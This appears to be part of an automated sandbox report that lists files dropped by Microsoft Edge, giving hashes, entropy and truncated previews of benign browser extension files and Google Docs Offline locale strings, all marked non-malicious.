Preview:.PNG........IHDR...2...2......?.....?iCCPICC Profile..H..W.XS...[.....@@J.M......B..6B. ...A..*.v...].Q..bG.,../.T.u.`W............9.3...{....<.$... _\(...d.JMc.......8.K..@......../..D.^q.k.....-.......q......~..*.DZ..Q.[L*..1.@G...x..g)q..g(.n.Mb<..V..<.4...%.3..YP.....X ....../?....t.m...b.>+.....if.j.xY.X9.EQ...H.xS..t..'..a.+5[../.3......rL..G.....6..D..=.(%[....G.....3...........!..H...)..B.W.:YT.M.X........F.x./.!S.a...<....}Yn.[..:[.U.c......).[....!.C.T......Y.........[B./...*...LiH..,.``...l.7Z...f'.)..y...\.KB1;i@GX0*r`..aP.r..3.8)A..AR.....S$y.*{.\..*..!v+(JP....T....De.xq./<V....D....L .5.L.9@......=!... ............k.(..B$.......BP........2..E....... ...{.b.x.[2x...?..`..x.`...{~...!..bd.......`b.1..B...q?......X]p..50....'...C.5B'..xQ...(.@'..Q."..\..P....}.:T..pC...A?l..zv.,G..<+...6......LF.C..d.G....*.\...e..........C............`'.s.a..0.cX........X.....+..:....x..L.8.:w;.Q...'...3A2E*...d...A...N......./...8.w..k.......c.....s......

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1420
Entropy (8bit):5.403738066771163
Encrypted:false
SSDEEP:
MD5:34E0125B791FFEB80E39F6F43BC163AF
SHA1:93663E337D623CC2D2FA620472BBA09651AFAF7C
SHA-256:16A49A370A58E36679D306CD616349F86D74957C884C2336FA582AD76EE8C98C
SHA-512:A693C9C47F752A4DF66F74B4580EC2C5A458D2E9DFF39F045A40E7139C23B1B4C0951C3FC4E1B4481179C381CC6B941ED63221868071DEADC7FE6695C86B1E24
Malicious:false
Reputation:unknown
Preview:{"logTime": "1006/090722", "correlationVector":"rmkayOhJfEabcRCB2/Bp31","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/090722", "correlationVector":"jqHPV/yTVN5KYgOfDN/5Rr","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/090722", "correlationVector":"25C1A0EE3BD244A1BB83CF2641B12F1A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/093120", "correlationVector":"a/GaihlkzouX6tpAQ3civy","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/093121", "correlationVector":"2831F27CA5B645488E2DF2452C16A59E","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/093243", "correlationVector":"7DhT8FK3VbHYWFgub0ZtsN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/093243", "correlationVector":"83EFC8979E1A419495133BAFAFA5A23F","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/093745", "correlationVector":"Bxyvid0fodNJ7Wehc/BC7P","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/093746", "correlationVector":"B1516CBB

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1432935113\47568418-0c76-4f25-bae7-93cf8946e9c2.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Google Chrome extension, version 3
Category:dropped
Size (bytes):11185
Entropy (8bit):7.951995436832936
Encrypted:false
SSDEEP:
MD5:78E47DDA17341BED7BE45DCCFD89AC87
SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:false
Reputation:unknown
Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1432935113\CRX_INSTALL\_metadata\verified_contents.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1753
Entropy (8bit):5.8889033066924155
Encrypted:false
SSDEEP:
MD5:738E757B92939B24CDBBD0EFC2601315
SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:false
Reputation:unknown
Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1432935113\CRX_INSTALL\content.js

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:dropped
Size (bytes):9815
Entropy (8bit):6.1716321262973315
Encrypted:false
SSDEEP:
MD5:3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:false
Reputation:unknown
Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1432935113\CRX_INSTALL\content_new.js

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:dropped
Size (bytes):10388
Entropy (8bit):6.174387413738973
Encrypted:false
SSDEEP:
MD5:3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:false
Reputation:unknown
Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1432935113\CRX_INSTALL\manifest.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):962
Entropy (8bit):5.698567446030411
Encrypted:false
SSDEEP:
MD5:E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:2356F60884130C86A45D4B232A26062C7830E622
SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:false
Reputation:unknown
Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\181be387-cbcf-4d49-89df-8c7be748dac7.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Google Chrome extension, version 3
Category:dropped
Size (bytes):135748
Entropy (8bit):7.8064882260604795
Encrypted:false
SSDEEP:
MD5:F8E609603D53C701422BBC4E026740C8
SHA1:5D08BA917111A8FCE835BE950477156720E57437
SHA-256:AEA99C066ADDC7157626D59326D8E5589402F6AAC551A0560B92710BA68DED8A
SHA-512:5CBDFC06D076665752B4A1AEFD697F8AF7DD2F673C2A65D363DDE5E27E97451BBF6D6097C0B9003CCCC886B1EC0CC3CD66BE58C57076C181D2749249395462BC
Malicious:false
Reputation:unknown
Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........S.o..g.z..6....L.-....Q.n!'...........w_...r.zy..xb.......+h/+........j+..+....z......;`....AF."].v.br..g'.$.....q..b...........G....i0..L...bW....\.t..g...t.....9,~K.*..rx.......U......|..8.F._.....&....-.A..h..>.#..fdM{V..dX....=.....r....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. `=.I...,..S&......C...EA."p.^ot.!..d..c...,Z=.3..<.|...U.N.Uc.(..".%............o..:..._.0...k....)...W..`*...*.B..w_..h...j.%....~|.s...o?d}.>/.t..?..c...5.6...~Q....q...Z....S=L?...c.T.B....-M...62.i*.Q.....%....+S.......lty\....!..^/..M.R.....,..j..8.....r...|.|{..L.;_.:.<C.....q.4f....0bp......EO.\..!

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\128.png

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:modified
Size (bytes):4982
Entropy (8bit):7.929761711048726
Encrypted:false
SSDEEP:
MD5:913064ADAAA4C4FA2A9D011B66B33183
SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:false
Reputation:unknown
Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\af\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):908
Entropy (8bit):4.512512697156616
Encrypted:false
SSDEEP:
MD5:12403EBCCE3AE8287A9E823C0256D205
SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\am\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1285
Entropy (8bit):4.702209356847184
Encrypted:false
SSDEEP:
MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:58979859B28513608626B563138097DC19236F1F
SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ar\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1244
Entropy (8bit):4.5533961615623735
Encrypted:false
SSDEEP:
MD5:3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\az\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):977
Entropy (8bit):4.867640976960053
Encrypted:false
SSDEEP:
MD5:9A798FD298008074E59ECC253E2F2933
SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\be\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3107
Entropy (8bit):3.535189746470889
Encrypted:false
SSDEEP:
MD5:68884DFDA320B85F9FC5244C2DD00568
SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\bg\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1389
Entropy (8bit):4.561317517930672
Encrypted:false
SSDEEP:
MD5:2E6423F38E148AC5A5A041B1D5989CC0
SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\bn\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1763
Entropy (8bit):4.25392954144533
Encrypted:false
SSDEEP:
MD5:651375C6AF22E2BCD228347A45E3C2C9
SHA1:109AC3A912326171D77869854D7300385F6E628C
SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ca\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):930
Entropy (8bit):4.569672473374877
Encrypted:false
SSDEEP:
MD5:D177261FFE5F8AB4B3796D26835F8331
SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\cs\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):913
Entropy (8bit):4.947221919047
Encrypted:false
SSDEEP:
MD5:CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\cy\messages.json

Download File
